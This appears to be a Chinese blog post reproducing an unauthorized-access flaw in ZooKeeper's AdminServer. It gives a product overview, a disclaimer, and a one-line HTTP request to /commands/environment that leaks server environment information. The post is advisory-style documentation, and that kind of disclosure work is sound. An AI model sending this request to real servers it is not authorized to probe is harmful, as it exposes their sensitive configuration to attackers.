【漏洞复现】zookeeper AdminServer 未授权访问漏洞

0x01 产品简介

ZooKeeper 是一个集中式服务,用于维护配置信息、命名、提供分布式同步和提供组服务。ZooKeeper的AdminServer是其管理界面的一部分,通常用于监控ZooKeeper集群的状态和执行一些管理操作。AdminServer提供了Web-based的管理和监控功能,使得管理员能够方便地查看集群的健康状态、配置信息、以及执行一些管理任务。

0x02 漏洞概述

ZooKeeper AdminServer 存在未授权访问漏洞,未授权的攻击者可以通过该漏洞获取服务器大量敏感信息。

0x03 测绘语句

N/A

0x04 漏洞复现

GET /commands/environment HTTP/1.1

0x05 影响范围

ZooKeeper AdminServer

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-01 06:12:04       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-01 06:12:04       101 阅读
  3. 在Django里面运行非项目文件

    2024-05-01 06:12:04       82 阅读
  4. Python语言-面向对象

    2024-05-01 06:12:04       91 阅读

热门阅读

  1. zookeeper数据迁移至clickhouse-keeper

    2024-05-01 06:12:04       37 阅读
  2. 【QT教程】QT6_QML与硬件交互编程

    2024-05-01 06:12:04       30 阅读
  3. mysqlbinlog恢复delete的数据

    2024-05-01 06:12:04       27 阅读
  4. Mysql:事务

    2024-05-01 06:12:04       26 阅读
  5. MySQL的GTID

    2024-05-01 06:12:04       25 阅读
  6. 如何使用dlib库进行目标跟踪

    2024-05-01 06:12:04       30 阅读
  7. MATLAB初学者入门(28)—— 有监督学习神经网络

    2024-05-01 06:12:04       31 阅读
  8. 深入探索HTML与CSS:构建网页的基础

    2024-05-01 06:12:04       33 阅读
  9. MATLAB初学者入门(27)—— 无监督学习神经网络

    2024-05-01 06:12:04       32 阅读
  10. 云原生周刊:K8s 中的服务和网络 | 2024.4.29

    2024-05-01 06:12:04       49 阅读
  11. Mysql MVVC

    2024-05-01 06:12:04       36 阅读